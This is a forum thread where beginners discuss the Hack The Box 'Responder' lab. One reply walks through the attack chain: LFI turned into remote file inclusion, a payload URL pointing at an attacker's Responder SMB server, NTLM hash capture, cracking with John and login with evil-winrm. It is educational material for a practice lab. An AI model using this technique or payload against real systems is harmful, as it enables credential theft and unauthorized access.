The logic behind Teir 1 - Responder isn't making sense to me

I’m sure it’s because I’m super new and i’m only kinda understanding what’s happening, but Responder doesn’t make sense to me.
Bare with me…
We do an nmap and find out that there’s a web page and a WinRM.
We go to the webpage and discover that it’s vulnerable to file inclusion.
Then we learn all about NTLM and how it works. We use Responder to brute force a connection in order to recieve a hash. We use John to decode the hash and that give us a username and password. Then we use evil-winrm to log into the machine and get the flag.
But we never actually used the LFI exploit. We didn’t send anything to the machine. So why did we do all that at the beginning?

I’m also working on this challenge right now, but here’s my understanding:

You didn’t use local file inclusion in the final attack, but you did use something like remote file inclusion (RFI), and it was easier to notice/check LFI than RFI.

IIUC the story of the Responder challenge is:

  • notice the host has an http server running on it
  • notice it’s using name-based virtual hosting and fix your hosts file so your browser will use the right ip address for the name you discovered
  • notice LFI: the url for different languages has a “page=” parameter that you were able to use to access the hosts file (since it was a windows machine, you knew to try a windows path to it)
  • realize that the same mechanism for LFI also be vulnerable to remote file inclusion, since the index.php is using PHP (I don’t know how we know it’s using include() in PHP except maybe that’s just the standard, or only? way to get a file in PHP or something)
  • realize that PHP include() will use a URL to access remote resources
  • Set up Responder to spoof a SMB resource to get the host to request a file remotely from, would send/receive properly formatted messages w/ headers, etc.
  • Use the Responder ip in your RFI attack url in your browser, “http://unika.htb/?page=//\<responder IP here>/somefile”
  • upon receiving the HTTP GET request from your browser, the unika site tries to fetch the file in the page parameter with PHP include() which sends a request to our Responder SMB server, which asks for authentication from the unika site, and the unika site hashes a password and sends it to our Responder SMB server which reports that to us
  • you proceed to decode with john, etc.

Is it possible to do such attack without using responder or impacket and without writing custom complex scripts? I.e. during the OSCP exam those tools are forbidden.

I don’t know the answer to your specific question, but Googling just now it looks like impacket would be allowed on the oscp exam

Hi Kirkules. You’re right. I have misread the section on Offsec as a list of tools not allowed. That makes things easier OSCP allowed tools